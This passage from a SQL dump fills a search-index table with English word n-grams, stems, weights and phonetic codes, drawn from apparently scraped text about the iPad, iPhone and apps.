2.apple',0,1,1.7,'F4132142',1,'en'),(16610,'following few','follow few',0,1,1.4333,'F4521',1,'en'),(16611,'following few lying','follow few lying',0,1,1.6333,'F4521452',1,'en'),(16612,'for an','for an',0,1,1.2,'F650',2,'en'),(16613,'for an download','for an download',0,1,1.5,'F653543',1,'en'),(16614,'for nearly','for nearly',0,1,1.3333,'F6564',1,'en'),(16615,'for nearly devices','for nearly devices',0,1,1.6,'F6564312',1,'en'),(16616,'for the ipad','for the ipad',0,1,1.4,'F6313',1,'en'),(16617,'for there','for there',0,1,1.3,'F636',1,'en'),(16618,'for there is','for there is',0,1,1.4,'F6362',1,'en'),(16619,'for touch','for touch',0,1,1.3,'F632',1,'en'),(16620,'for touch screens','for touch screens',0,1,1.5667,'F632652',1,'en'),(16621,'for your','for your',0,1,1.2667,'F600',1,'en'),(16622,'for your fingers','for your fingers',0,1,1.5333,'F615262',1,'en'),(16623,'for your laptop\'s','for your laptop',0,1,1.5667,'F641312',1,'en'),(16624,'free','free',0,0,0.2667,'F600',4,'en'),(16625,'free classics','free classics',0,1,1.4333,'F6242',1,'en'),(16626,'free classics or','free classics or',0,1,1.5333,'F62426',1,'en'),(16627,'friendly and','friendli and',0,1,1.4,'F653453',1,'en'),(16628,'friendly and outstanding','friendli and outstanding',0,1,1.8,'F653453235352',1,'en'),(16629,'fro','fro',0,0,0.2,'F600',1,'en'),(16630,'fro while','fro while',0,1,1.3,'F640',1,'en'),(16631,'fro while outside','fro while outside',0,1,1.5667,'F64323',1,'en'),(16632,'from app','from app',0,1,1.2667,'F651',1,'en'),(16633,'from app to','from app to',0,1,1.3667,'F6513',1,'en'),(16634,'from command','from command',0,1,1.4,'F65253',1,'en'),(16635,'from command lines','from command lines',0,1,1.6,'F65253452',1,'en'),(16636,'from injuries','from injuries',0,1,1.4333,'F65262',1,'en'),(16637,'from injuries a','from injuries a',0,1,1.5,'F65262',1,'en'),(16638,'from magazines','from magazines',0,1,1.4667,'F65252',1,'en'),(16639,'from magazines in','from magazines in',0,1,1.5667,'F652525',1,'en'),(16640,'from mice','from mice',0,1,1.3,'F652',1,'en'),(16641,'from mice and','from mice and',0,1,1.4333,'F65253',1,'en'),(16642,'full computer','full computer',0,1,1.4333,'F425136',1,'en'),(16643,'full computer os','full computer os',0,1,1.5333,'F4251362',1,'en'),(16644,'full sizemonotasking','full sizemonotasking',0,1,1.6667,'F4253252',1,'en'),(16645,'full sizemonotasking you','full sizemonotasking you',0,1,1.8,'F4253252',1,'en'),(16646,'full sizethe','full sizethe',0,1,1.4,'F423',1,'en'),(16647,'full sizethe new','full sizethe new',0,1,1.5333,'F4235',1,'en'),(16648,'fully trust','fulli trust',0,1,1.3667,'F43623',1,'en'),(16649,'fully trust your','fulli trust your',0,1,1.5333,'F436236',1,'en'),(16650,'furthermore','furthermor',0,0,0.7333,'F63656',1,'en'),(16651,'furthermore 4','furthermor 4',0,1,1.4333,'F63656',1,'en'),(16652,'furthermore 4 as','furthermor 4 as',0,1,1.5333,'F636562',1,'en'),(16653,'game','game',0,0,0.2667,'G500',2,'en'),(16654,'game phone','game phone',0,1,1.3333,'G515',1,'en'),(16655,'game phone on','game phone on',0,1,1.4333,'G515',1,'en'),(16656,'games','game',0,0,0.3333,'G520',2,'en'),(16657,'games david','game david',0,1,1.3667,'G52313',1,'en'),(16658,'games david pogue','game david pogue',0,1,1.5667,'G5231312',1,'en'),(16659,'generally','gener',0,0,0.6,'G564',4,'en'),(16660,'generally just','gener just',0,1,1.4667,'G56423',1,'en'),(16661,'generally just lashing','gener just lashing',0,1,1.7333,'G564234252',1,'en'),(16662,'generation','gener',0,0,0.6667,'G5635',1,'en'),(16663,'generation of','gener of',0,1,1.4333,'G56351',1,'en'),(16664,'generation of children','gener of children',0,1,1.7333,'G5635124365',1,'en'),(16665,'get','get',1,0,0.025,'G300',11,'en'),(16666,'get you','get you',0,1,1.2333,'G300',1,'en'),(16667,'get you an','get you an',0,1,1.3333,'G350',1,'en'),(16668,'girls','girl',0,0,0.3333,'G642',4,'en'),(16669,'girls 2','girl 2',0,1,1.2333,'G642',1,'en'),(16670,'girls 2 furthermore','girl 2 furthermore',0,1,1.6333,'G642163656',1,'en'),(16671,'girls as','girl as',0,1,1.2667,'G642',1,'en'),(16672,'girls as wife','girl as wife',0,1,1.4333,'G6421',1,'en'),(16673,'good','good',0,0,0.2667,'G300',4,'en'),(16674,'good as','good as',0,1,1.2333,'G320',1,'en'),(16675,'good as advertised','good as advertised',0,1,1.6,'G32316323',1,'en'),(16676,'good pc','good pc',0,1,1.2333,'G312',1,'en'),(16677,'good pc you','good pc you',0,1,1.3667,'G312',1,'en'),(16678,'good start','good start',0,1,1.3333,'G32363',1,'en'),(16679,'good start if','good start if',0,1,1.4333,'G323631',1,'en'),(16680,'google','googl',0,0,0.4,'G400',3,'en'),(16681,'google documents','googl documents',0,1,1.5333,'G432532',1,'en'),(16682,'google documents assess','googl documents assess',0,1,1.7667,'G432532',1,'en'),(16683,'gorgeous','gorgeou',0,0,0.5333,'G620',1,'en'),(16684,'gorgeous photos','gorgeou photos',0,1,1.5,'G62132',1,'en'),(16685,'gorgeous photos but','gorgeou photos but',0,1,1.6333,'G6213213',1,'en'),(16686,'had','had',0,0,0.2,'H300',9,'en'),(16687,'had gorgeous','had gorgeous',0,1,1.4,'H3262',1,'en'),(16688,'had gorgeous photos','had gorgeous photos',0,1,1.6333,'H3262132',1,'en'),(16689,'had harsh','had harsh',0,1,1.3,'H362',1,'en'),(16690,'had harsh apps','had harsh apps',0,1,1.4667,'H36212',1,'en'),(16691,'had stunning','had stunning',0,1,1.4,'H32352',1,'en'),(16692,'had stunning color','had stunning color',0,1,1.6,'H3235246',1,'en'),(16693,'handled','handl',0,0,0.4667,'H5343',1,'en'),(16694,'handled exquisitely','handl exquisitely',0,1,1.6333,'H5343234',1,'en'),(16695,'handled exquisitely and','handl exquisitely and',0,1,1.7667,'H534323453',1,'en'),(16696,'handy','handi',0,0,0.3333,'H530',2,'en'),(16697,'handy enough','handi enough',0,1,1.4,'H5352',1,'en'),(16698,'handy enough to','handi enough to',0,1,1.5,'H53523',1,'en'),(16699,'happened','happen',0,0,0.5333,'H153',2,'en'),(16700,'happened to','happen to',0,1,1.3667,'H153',1,'en'),(16701,'happened to the','happen to the',0,1,1.5,'H153',1,'en'),(16702,'hard','hard',0,0,0.2667,'H630',3,'en'),(16703,'hard to','hard to',0,1,1.2333,'H630',1,'en'),(16704,'hard to read','hard to read',0,1,1.4,'H6363',1,'en'),(16705,'harsh','harsh',0,0,0.3333,'H620',1,'en'),(16706,'harsh apps','harsh apps',0,1,1.3333,'H6212',1,'en'),(16707,'harsh apps ap\'s','harsh apps ap',0,1,1.5,'H621212',1,'en'),(16708,'has figured','ha figured',0,1,1.3667,'H21263',1,'en'),(16709,'has figured out','ha figured out',0,1,1.5,'H21263',1,'en'),(16710,'has never','ha never',0,1,1.3,'H2516',1,'en'),(16711,'has never been','ha never been',0,1,1.4667,'H251615',1,'en'),(16712,'has some','ha some',0,1,1.2667,'H250',1,'en'),(16713,'has some iphone\'s','ha some iphone',0,1,1.5667,'H25152',1,'en'),(16714,'have a more','have a more',0,1,1.3667,'H156',1,'en'),(16715,'have speed','have speed',0,1,1.3333,'H1213',1,'en'),(16716,'have speed up','have speed up',0,1,1.4333,'H12131',1,'en'),(16717,'have to','have to',0,1,1.2333,'H130',3,'en'),(16718,'have to loose','have to loose',0,1,1.4333,'H1342',1,'en'),(16719,'have to sell','have to sell',0,1,1.4,'H1324',1,'en'),(16720,'hear','hear',0,0,0.2667,'H600',2,'en'),(16721,'hear the','hear the',0,1,1.2667,'H630',1,'en'),(16722,'hear the game','hear the game',0,1,1.4333,'H6325',1,'en'),(16723,'held','held',0,0,0.2667,'H430',4,'en'),(16724,'held the','held the',0,1,1.2667,'H430',2,'en'),(16725,'held the tablet','held the tablet',0,1,1.5,'H43143',1,'en'),(16726,'held them','held them',0,1,1.3,'H435',1,'en'),(16727,'held them down','held them down',0,1,1.4667,'H43535',1,'en'),(16728,'here','here',0,0,0.2667,'H600',5,'en'),(16729,'here but','here but',0,1,1.2667,'H613',1,'en'),(16730,'here but it','here but it',0,1,1.3667,'H613',1,'en'),(16731,'his patrol','hi patrol',0,1,1.3333,'H21364',1,'en'),(16732,'his patrol carsyracuse','hi patrol carsyracuse',0,1,1.7333,'H2136426262',1,'en'),(16733,'hit','hit',0,0,0.2,'H300',2,'en'),(16734,'hit his','hit his',0,1,1.2333,'H320',1,'en'),(16735,'hit his patrol','hit his patrol',0,1,1.4667,'H321364',1,'en'),(16736,'however','howev',0,0,0.4667,'H160',4,'en'),(16737,'however one','howev one',0,1,1.3667,'H165',1,'en'),(16738,'however one thing','howev one thing',0,1,1.5667,'H165352',1,'en'),(16739,'i believed','i believed',0,1,1.3333,'I1413',1,'en'),(16740,'i believed the','i believed the',0,1,1.4667,'I1413',1,'en'),(16741,'i do','i do',0,1,1.1333,'I300',1,'en'),(16742,'i do wonder','i do wonder',0,1,1.3667,'I3536',1,'en'),(16743,'i doesn\'t','i doesn',0,1,1.3,'I3253',1,'en'),(16744,'i doesn\'t i','i doesn i',0,1,1.3667,'I3253',1,'en'),(16745,'i don\'t','i don',0,1,1.2333,'I353',2,'en'),(16746,'i don\'t possess','i don possess',0,1,1.5,'I35312',1,'en'),(16747,'i don\'t want','i don want',0,1,1.4,'I35353',1,'en'),(16748,'i expected','i expected',0,1,1.3333,'I2123',1,'en'),(16749,'i expected even','i expected even',0,1,1.5,'I212315',1,'en'),(16750,'i held','i held',0,1,1.2,'I430',1,'en'),(16751,'i held the','i held the',0,1,1.3333,'I430',1,'en'),(16752,'i noticed','i noticed',0,1,1.3,'I5323',2,'en'),(16753,'i noticed the','i noticed the',0,1,1.4333,'I5323',1,'en'),(16754,'i should','i should',0,1,1.2667,'I243',1,'en'),(16755,'i should just','i should just',0,1,1.4333,'I24323',1,'en'),(16756,'i think','i think',0,1,1.2333,'I352',4,'en'),(16757,'i think i\'d','i think i',0,1,1.3667,'I3523',1,'en'),(16758,'i was','i was',0,1,1.1667,'I200',5,'en'),(16759,'i was expecting','i was expecting',0,1,1.5,'I212352',1,'en'),(16760,'i wasn\'t','i wasn',0,1,1.2667,'I253',2,'en'),(16761,'i wasn\'t able','i wasn able',0,1,1.4333,'I25314',1,'en'),(16762,'i\'d','i',0,0,0.2,'I300',1,'en'),(16763,'i\'d rather','i rather',0,1,1.3333,'I3636',1,'en'),(16764,'i\'d rather have','i rather have',0,1,1.5,'I36361',1,'en'),(16765,'i\'ll','i',0,0,0.2667,'I400',2,'en'),(16766,'i\'ll mostly','i mostly',0,1,1.3667,'I45234',1,'en'),(16767,'i\'ll mostly put','i mostly put',0,1,1.5,'I4523413',1,'en'),(16768,'i\'ll review','i review',0,1,1.3667,'I461',1,'en'),(16769,'i\'ll review my','i review my',0,1,1.4667,'I4615',1,'en'),(16770,'i-phone\'s','i-phone',0,0,0.6,'I152',1,'en'),(16771,'i-phone\'s copy','i-phone copy',0,1,1.4667,'I1521',1,'en'),(16772,'i-phone\'s copy paste','i-phone copy paste',0,1,1.6667,'I152123',1,'en'),(16773,'ibooks','ibook',0,0,0.4,'I120',1,'en'),(16774,'ibooks comes','ibook comes',0,1,1.4,'I1252',1,'en'),(16775,'ibooks comes pre','ibook comes pre',0,1,1.5333,'I125216',1,'en'),(16776,'ideological','ideolog',0,0,0.7333,'I3424',1,'en'),(16777,'ideological debate','ideolog debate',0,1,1.6,'I3424313',1,'en'),(16778,'ideological debate over','ideolog debate over',0,1,1.7667,'I342431316',1,'en'),(16779,'if apple','if apple',0,1,1.2667,'I140',1,'en'),(16780,'if apple allows','if apple allows',0,1,1.5,'I142',1,'en'),(16781,'if it\'s','if it',0,1,1.2333,'I132',1,'en'),(16782,'if it\'s not','if it not',0,1,1.3667,'I13253',1,'en'),(16783,'if the','if the',0,1,1.2,'I130',2,'en'),(16784,'if the ipad','if the ipad',0,1,1.3667,'I1313',1,'en'),(16785,'if you','if you',0,1,1.2,'I100',4,'en'),(16786,'if you should','if you should',0,1,1.4333,'I1243',1,'en'),(16787,'in any','in any',0,1,1.2,'I500',2,'en'),(16788,'in any other','in any other',0,1,1.4,'I536',1,'en'),(16789,'in family','in family',0,1,1.3,'I5154',1,'en'),(16790,'in family symbol','in family symbol',0,1,1.5333,'I51542514',1,'en'),(16791,'in finger','in finger',0,1,1.3,'I51526',1,'en'),(16792,'in finger prints','in finger prints',0,1,1.5333,'I5152616532',1,'en'),(16793,'in prison','in prison',0,1,1.3,'I51625',1,'en'),(16794,'in spite','in spite',0,1,1.2667,'I5213',1,'en'),(16795,'in spite of','in spite of',0,1,1.3667,'I52131',1,'en'),(16796,'in the app','in the app',0,1,1.3333,'I531',1,'en'),(16797,'in the shiny','in the shiny',0,1,1.4,'I5325',1,'en'),(16798,'in this','in this',0,1,1.2333,'I532',3,'en'),(16799,'in this category','in this category',0,1,1.5333,'I532326',1,'en'),(16800,'in your','in your',0,1,1.2333,'I560',4,'en'),(16801,'in your e','in your e',0,1,1.3,'I560',1,'en'),(16802,'inconvenient','inconveni',0,0,0.8,'I525153',1,'en'),(16803,'inconvenient and','inconveni and',0,1,1.5333,'I52515353',1,'en'),(16804,'inconvenient and some','inconveni and some',0,1,1.7,'I5251535325',1,'en'),(16805,'inconvenient the','inconveni the',0,1,1.5333,'I525153',1,'en'),(16806,'inconvenient the world-wide-web','inconveni the world-wide-web',0,1,2,'I5251536431',1,'en'),(16807,'individuals ask','individu ask',0,1,1.5,'I531342',1,'en'),(16808,'individuals ask i\'ll','individu ask i',0,1,1.6667,'I5313424',1,'en'),(16809,'injuries','injuri',0,0,0.5333,'I5262',4,'en'),(16810,'injuries a','injuri a',0,1,1.3333,'I5262',1,'en'),(16811,'injuries a day','injuri a day',0,1,1.4667,'I52623',1,'en'),(16812,'inside','insid',0,0,0.4,'I523',1,'en'),(16813,'inside of','insid of',0,1,1.3,'I5231',1,'en'),(16814,'inside of of','insid of of',0,1,1.4,'I5231',1,'en'),(16815,'installed','instal',0,0,0.6,'I52343',1,'en'),(16816,'installed with','instal with',0,1,1.4667,'I52343',1,'en'),(16817,'installed with winnie','instal with winnie',0,1,1.7,'I523435',1,'en'),(16818,'instant','instant',0,0,0.4667,'I52353',2,'en'),(16819,'instant on','instant on',0,1,1.3333,'I523535',1,'en'),(16820,'instant on and','instant on and',0,1,1.4667,'I5235353',1,'en'),(16821,'internet that','internet that',0,1,1.4333,'I53653',1,'en'),(16822,'internet that all','internet that all',0,1,1.5667,'I536534',1,'en'),(16823,'internet yet','internet yet',0,1,1.4,'I53653',1,'en'),(16824,'internet yet after','internet yet after',0,1,1.6,'I53653136',1,'en'),(16825,'into an','into an',0,1,1.2333,'I535',1,'en'),(16826,'into an outlook','into an outlook',0,1,1.5,'I535342',1,'en'),(16827,'into you','into you',0,1,1.2667,'I530',1,'en'),(16828,'into you but','into you but',0,1,1.4,'I5313',1,'en'),(16829,'ipad','ipad',0,0,0.2667,'I130',2,'en'),(16830,'ipad app','ipad app',0,1,1.2667,'I131',1,'en'),(16831,'ipad app to','ipad app to',0,1,1.3667,'I1313',1,'en'),(16832,'ipad can','ipad can',0,1,1.2667,'I1325',1,'en'),(16833,'ipad can create','ipad can create',0,1,1.5,'I1325263',1,'en'),(16834,'ipad is','ipad is',0,1,1.2333,'I132',1,'en'),(16835,'ipad is based','ipad is based',0,1,1.4333,'I132123',1,'en'),(16836,'ipad is nearby','ipad is nearby',0,1,1.4667,'I132561',1,'en'),(16837,'ipad is so','ipad is so',0,1,1.3333,'I132',1,'en'),(16838,'ipad is the','ipad is the',0,1,1.3667,'I1323',1,'en'),(16839,'ipad is your','ipad is your',0,1,1.4,'I1326',1,'en'),(16840,'ipad screen','ipad screen',0,1,1.3667,'I13265',1,'en'),(16841,'ipad screen marvel\'s','ipad screen marvel',0,1,1.6667,'I132656142',1,'en'),(16842,'ipad that','ipad that',0,1,1.3,'I130',1,'en'),(16843,'ipad that i','ipad that i',0,1,1.3667,'I130',1,'en'),(16844,'ipad uses','ipad uses',0,1,1.3,'I132',1,'en'),(16845,'ipad uses the','ipad uses the',0,1,1.4333,'I1323',1,'en'),(16846,'ipad\'s','ipad',0,0,0.4,'I132',1,'en'),(16847,'ipad\'s biggest','ipad biggest',0,1,1.4667,'I132123',1,'en'),(16848,'ipad\'s biggest change','ipad biggest change',0,1,1.7,'I132123252',1,'en'),(16849,'ipad\'s touchscreen','ipad touchscreen',0,1,1.6,'I1323265',1,'en'),(16850,'ipad\'s touchscreen display','ipad touchscreen display',0,1,1.8667,'I13232653214',1,'en'),(16851,'iphone','iphon',0,0,0.4,'I150',2,'en'),(16852,'iphone and','iphon and',0,1,1.3333,'I153',1,'en'),(16853,'iphone and i','iphon and i',0,1,1.4,'I153',1,'en'),(16854,'iphone apps','iphon apps',0,1,1.3667,'I1512',1,'en'),(16855,'iphone apps and','iphon apps and',0,1,1.5,'I151253',1,'en'),(16856,'iphone\'s','iphon',0,0,0.5333,'I152',1,'en'),(16857,'iphone\'s obscure','iphon obscure',0,1,1.5333,'I152126',1,'en'),(16858,'iphone\'s obscure limitations','iphon obscure limitations',0,1,1.9333,'I15212645352',1,'en'),(16859,'ipod','ipod',0,0,0.2667,'I130',2,'en'),(16860,'ipod music','ipod music',0,1,1.3333,'I1352',1,'en'),(16861,'ipod music it','ipod music it',0,1,1.4333,'I13523',1,'en'),(16862,'is a 9','is a 9',0,1,1.2,'I200',1,'en'),(16863,'is a from','is a from',0,1,1.3,'I2165',1,'en'),(16864,'is as','is as',0,1,1.1667,'I200',1,'en'),(16865,'is as good','is as good',0,1,1.3333,'I230',1,'en'),(16866,'is based','is based',0,1,1.2667,'I2123',1,'en'),(16867,'is based on','is based on',0,1,1.3667,'I21235',1,'en'),(16868,'is earlier','is earlier',0,1,1.3333,'I2646',1,'en'),(16869,'is earlier leader','is earlier leader',0,1,1.5667,'I2646436',1,'en'),(16870,'is friendly','is friendly',0,1,1.3667,'I216534',1,'en'),(16871,'is friendly and','is friendly and',0,1,1.5,'I21653453',1,'en'),(16872,'is however','is however',0,1,1.3333,'I216',1,'en'),(16873,'is however one','is however one',0,1,1.4667,'I2165',1,'en'),(16874,'is inconvenient','is inconvenient',0,1,1.5,'I2525153',1,'en'),(16875,'is inconvenient and','is inconvenient and',0,1,1.6333,'I252515353',1,'en'),(16876,'is instant','is instant',0,1,1.3333,'I252353',1,'en'),(16877,'is instant on','is instant on',0,1,1.4333,'I2523535',1,'en'),(16878,'is maximum','is maximum',0,1,1.3333,'I2525',1,'en'),(16879,'is maximum 27','is maximum 27',0,1,1.4333,'I2525',1,'en'),(16880,'is nearby','is nearby',0,1,1.3,'I2561',1,'en'),(16881,'is nearby and','is nearby and',0,1,1.4333,'I256153',1,'en'),(16882,'is not','is not',0,1,1.2,'I253',5,'en'),(16883,'is not well','is not well',0,1,1.3667,'I2534',1,'en'),(16884,'is so','is so',0,1,1.1667,'I200',1,'en'),(16885,'is so fast','is so fast',0,1,1.3333,'I2123',1,'en'),(16886,'is the','is the',0,1,1.2,'I230',10,'en'),(16887,'is the destroyer','is the destroyer',0,1,1.5333,'I23236',1,'en'),(16888,'is when','is when',0,1,1.2333,'I250',1,'en'),(16889,'is when you','is when you',0,1,1.3667,'I250',1,'en'),(16890,'is your','is your',0,1,1.2333,'I260',1,'en'),(16891,'is your own','is your own',0,1,1.3667,'I265',1,'en'),(16892,'it has some','it has some',0,1,1.3667,'I325',1,'en'),(16893,'it i','it i',0,1,1.1333,'I300',2,'en'),(16894,'it i doesn\'t','it i doesn',0,1,1.4,'I3253',1,'en'),(16895,'it may','it may',0,1,1.2,'I350',1,'en'),(16896,'it may the','it may the',0,1,1.3333,'I353',1,'en'),(16897,'it really','it really',0,1,1.3,'I364',2,'en'),(16898,'it really is','it really is',0,1,1.4,'I3642',1,'en'),(16899,'it stares','it stares',0,1,1.3,'I32362',1,'en'),(16900,'it stares into','it stares into',0,1,1.4667,'I3236253',1,'en'),(16901,'it to wobble','it to wobble',0,1,1.4,'I314',1,'en'),(16902,'it was','it was',0,1,1.2,'I320',6,'en'),(16903,'it was a','it was a',0,1,1.2667,'I320',2,'en'),(16904,'it was hard','it was hard',0,1,1.3667,'I3263',1,'en'),(16905,'it would','it would',0,1,1.2667,'I343',1,'en'),(16906,'it would deal','it would deal',0,1,1.4333,'I3434',1,'en'),(16907,'it\'s','it',0,0,0.2667,'I320',7,'en'),(16908,'it\'s a','it a',0,1,1.2,'I320',2,'en'),(16909,'it\'s a good','it a good',0,1,1.3667,'I323',1,'en'),(16910,'it\'s easier','it easier',0,1,1.3667,'I326',1,'en'),(16911,'it\'s easier than','it easier than',0,1,1.5333,'I32635',1,'en'),(16912,'it\'s more','it more',0,1,1.3,'I3256',1,'en'),(16913,'it\'s more tolerable','it more tolerable',0,1,1.6333,'I325634614',1,'en'),(16914,'it\'s not','it not',0,1,1.2667,'I3253',1,'en'),(16915,'it\'s not already','it not already',0,1,1.5333,'I3253463',1,'en'),(16916,'it\'s that','it that',0,1,1.3,'I323',1,'en'),(16917,'it\'s that to','it that to',0,1,1.4,'I323',1,'en'),(16918,'its browser','it browser',0,1,1.3667,'I321626',1,'en'),(16919,'its browser is','it browser is',0,1,1.4667,'I3216262',1,'en'),(16920,'its layouts','it layouts',0,1,1.3667,'I32432',1,'en'),(16921,'its layouts were','it layouts were',0,1,1.5333,'I324326',1,'en'),(16922,'itself','itself',0,0,0.4,'I3241',3,'en'),(16923,'itself and','itself and',0,1,1.3333,'I324153',1,'en'),(16924,'itself and its','itself and its',0,1,1.4667,'I3241532',1,'en'),(16925,'iwork','iwork',0,0,0.3333,'I620',1,'en'),(16926,'iwork suite','iwork suite',0,1,1.3667,'I623',1,'en'),(16927,'iwork suite and','iwork suite and',0,1,1.5,'I62353',1,'en'),(16928,'jarvis','jarvi',0,0,0.4,'J612',1,'en'),(16929,'jarvis seems','jarvi seems',0,1,1.4,'J61252',1,'en'),(16930,'jarvis seems surprised','jarvi seems surprised',0,1,1.7333,'J6125261623',1,'en'),(16931,'jeff','jeff',0,0,0.2667,'J100',1,'en'),(16932,'jeff jarvis','jeff jarvis',0,1,1.3667,'J12612',1,'en'),(16933,'jeff jarvis seems','jeff jarvis seems',0,1,1.5667,'J1261252',1,'en'),(16934,'jobs','job',0,0,0.2667,'J120',4,'en'),(16935,'jobs i','job i',0,1,1.2,'J120',1,'en'),(16936,'jobs i do','job i do',0,1,1.3,'J123',1,'en'),(16937,'just don\'t','just don',0,1,1.3333,'J353',1,'en'),(16938,'just don\'t fully','just don fully',0,1,1.5333,'J35314',1,'en'),(16939,'just lashing','just lashing',0,1,1.4,'J34252',1,'en'),(16940,'just lashing back','just lashing back',0,1,1.5667,'J3425212',1,'en'),(16941,'just marketing','just marketing',0,1,1.4667,'J3562352',1,'en'),(16942,'just marketing decline','just marketing decline',0,1,1.7333,'J35623523245',1,'en'),(16943,'just type','just type',0,1,1.3,'J310',1,'en'),(16944,'just type with','just type with',0,1,1.4667,'J313',1,'en'),(16945,'keyboard','keyboard',0,0,0.5333,'K163',1,'en'),(16946,'keyboard on','keyboard on',0,1,1.3667,'K1635',1,'en'),(16947,'keyboard on a','keyboard on a',0,1,1.4333,'K1635',1,'en'),(16948,'knees','knee',0,0,0.3333,'K520',1,'en'),(16949,'knees up','knee up',0,1,1.2667,'K521',1,'en'),(16950,'knees up position','knee up position',0,1,1.5667,'K521235',1,'en'),(16951,'labeled','label',0,0,0.4667,'L143',1,'en'),(16952,'labeled editors\'','label editors',0,1,1.5333,'L14362',1,'en'),(16953,'labeled editors\' choice','label editors choice',0,1,1.7667,'L14362',1,'en'),(16954,'lack','lack',0,0,0.2667,'L200',2,'en'),(16955,'lack of','lack of',0,1,1.2333,'L210',2,'en'),(16956,'lack of multi','lack of multi',0,1,1.4333,'L21543',1,'en'),(16957,'laptop','laptop',0,0,0.4,'L131',1,'en'),(16958,'laptop then','laptop then',0,1,1.3667,'L13135',1,'en'),(16959,'laptop then you\'d','laptop then you',0,1,1.5667,'L131353',1,'en'),(16960,'laptop\'s','laptop',0,0,0.5333,'L1312',1,'en'),(16961,'laptop\'s desktop','laptop desktop',0,1,1.5333,'L13123231',1,'en'),(16962,'laptop\'s desktop to','laptop desktop to',0,1,1.6333,'L131232313',1,'en'),(16963,'laptops','laptop',0,0,0.4667,'L1312',2,'en'),(16964,'laptops 4.the','laptop 4.the',0,1,1.4333,'L13123',1,'en'),(16965,'laptops 4.the techies','laptop 4.the techies',0,1,1.7,'L131232',1,'en'),(16966,'lashing','lash',0,0,0.4667,'L252',1,'en'),(16967,'lashing back','lash back',0,1,1.4,'L25212',1,'en'),(16968,'lashing back at','lash back at',0,1,1.5,'L252123',1,'en'),(16969,'launch','launch',0,0,0.4,'L520',1,'en'),(16970,'launch i','launch i',0,1,1.2667,'L520',1,'en'),(16971,'launch i wasn\'t','launch i wasn',0,1,1.5,'L5253',1,'en'),(16972,'layouts','layout',0,0,0.4667,'L320',1,'en'),(16973,'layouts were','layout were',0,1,1.4,'L326',1,'en'),(16974,'layouts were static','layout were static',0,1,1.6333,'L326232',1,'en'),(16975,'leader in','leader in',0,1,1.3,'L365',1,'en'),(16976,'leader in this','leader in this',0,1,1.4667,'L36532',1,'en'),(16977,'league','leagu',0,0,0.4,'L200',1,'en'),(16978,'league baseball\'s','leagu baseball',0,1,1.5667,'L212142',1,'en'),(16979,'league baseball\'s app','leagu baseball app',0,1,1.7,'L2121421',1,'en'),(16980,'learn','learn',0,0,0.3333,'L650',1,'en'),(16981,'learn something','learn something',0,1,1.5,'L6525352',1,'en'),(16982,'learn something pleased','learn something pleased',0,1,1.7667,'L65253521423',1,'en'),(16983,'let','let',0,0,0.2,'L300',3,'en'),(16984,'let you','let you',0,1,1.2333,'L300',1,'en'),(16985,'let you hear','let you hear',0,1,1.4,'L360',1,'en'),(16986,'like','like',0,0,0.2667,'L200',7,'en'),(16987,'like clippings','like clippings',0,1,1.4667,'L24152',1,'en'),(16988,'like clippings scattered','like clippings scattered',0,1,1.8,'L24152363',1,'en'),(16989,'like to','like to',0,1,1.2333,'L230',1,'en'),(16990,'like to check','like to check',0,1,1.4333,'L232',1,'en'),(16991,'limitations','limit',0,0,0.7333,'L5352',2,'en'),(16992,'limitations why','limit why',0,1,1.5,'L5352',1,'en'),(16993,'limitations why can','limit why can',0,1,1.6333,'L53525',1,'en'),(16994,'lines','line',0,0,0.3333,'L520',1,'en'),(16995,'lines to','line to',0,1,1.2667,'L523',1,'en'),(16996,'lines to personal','line to personal',0,1,1.5667,'L52316254',1,'en'),(16997,'list','list',0,0,0.2667,'L230',4,'en'),(16998,'list with','list with',0,1,1.3,'L230',1,'en'),(16999,'list with more','list with more',0,1,1.4667,'L2356',1,'en'),(17000,'listen','listen',0,0,0.4,'L235',1,'en'),(17001,'listen to','listen to',0,1,1.3,'L2353',1,'en'),(17002,'listen to pandora','listen to pandora',0,1,1.5667,'L23531536',1,'en'),(17003,'listening','listen',0,0,0.6,'L2352',1,'en'),(17004,'listening besides','listen besides',0,1,1.5667,'L23521232',1,'en'),(17005,'listening besides ipod','listen besides ipod',0,1,1.7333,'L2352123213',1,'en'),(17006,'little','littl',0,0,0.4,'L340',5,'en'),(17007,'little girls','littl girls',0,1,1.4,'L342642',1,'en'),(17008,'little girls as','littl girls as',0,1,1.5,'L342642',1,'en'),(17009,'long','long',0,0,0.2667,'L520',6,'en'),(17010,'long thumbs','long thumbs',0,1,1.3667,'L523512',1,'en'),(17011,'long thumbs you','long thumbs you',0,1,1.5,'L523512',1,'en'),(17012,'loose','loos',0,0,0.3333,'L200',1,'en'),(17013,'loose time','loos time',0,1,1.3333,'L235',1,'en'),(17014,'loose time waiting','loos time waiting',0,1,1.6,'L235352',1,'en'),(17015,'lot','lot',0,0,0.2,'L300',7,'en'),(17016,'lot of','lot of',0,1,1.2,'L310',5,'en'),(17017,'lot of word','lot of word',0,1,1.3667,'L3163',1,'en'),(17018,'lying','ly',0,0,0.3333,'L520',1,'en'),(17019,'lying flat','ly flat',0,1,1.3333,'L52143',1,'en'),(17020,'lying flat on','ly flat on',0,1,1.4333,'L521435',1,'en'),(17021,'made','made',0,0,0.2667,'M300',11,'en'),(17022,'made the','made the',0,1,1.2667,'M300',1,'en'),(17023,'made the most','made the most',0,1,1.4333,'M3523',1,'en'),(17024,'magazine','magazin',0,0,0.5333,'M250',2,'en'),(17025,'magazine had','magazin had',0,1,1.4,'M253',1,'en'),(17026,'magazine had gorgeous','magazin had gorgeous',0,1,1.7,'M253262',1,'en'),(17027,'magazine ny','magazin ny',0,1,1.3667,'M250',1,'en'),(17028,'magazine ny teachers\'','magazin ny teachers',0,1,1.7,'M253262',1,'en'),(17029,'magazine publishers','magazin publishers',0,1,1.6333,'M2514262',1,'en'),(17030,'magazine publishers before','magazin publishers before',0,1,1.8667,'M251426216',1,'en'),(17031,'magazines','magazin',0,0,0.6,'M252',1,'en'),(17032,'magazines in','magazin in',0,1,1.4,'M2525',1,'en'),(17033,'magazines in the','magazin in the',0,1,1.5333,'M25253',1,'en'),(17034,'mail','mail',0,0,0.2667,'M400',2,'en'),(17035,'mail just','mail just',0,1,1.3,'M423',1,'en'),(17036,'mail just marketing','mail just marketing',0,1,1.6333,'M423562352',1,'en'),(17037,'mail program','mail program',0,1,1.4,'M416265',1,'en'),(17038,'mail program it\'s','mail program it',0,1,1.5667,'M41626532',1,'en'),(17039,'mail while','mail while',0,1,1.3333,'M400',1,'en'),(17040,'mail while the','mail while the',0,1,1.4667,'M430',1,'en'),(17041,'main','main',0,0,0.2667,'M000',2,'en'),(17042,'main system','main 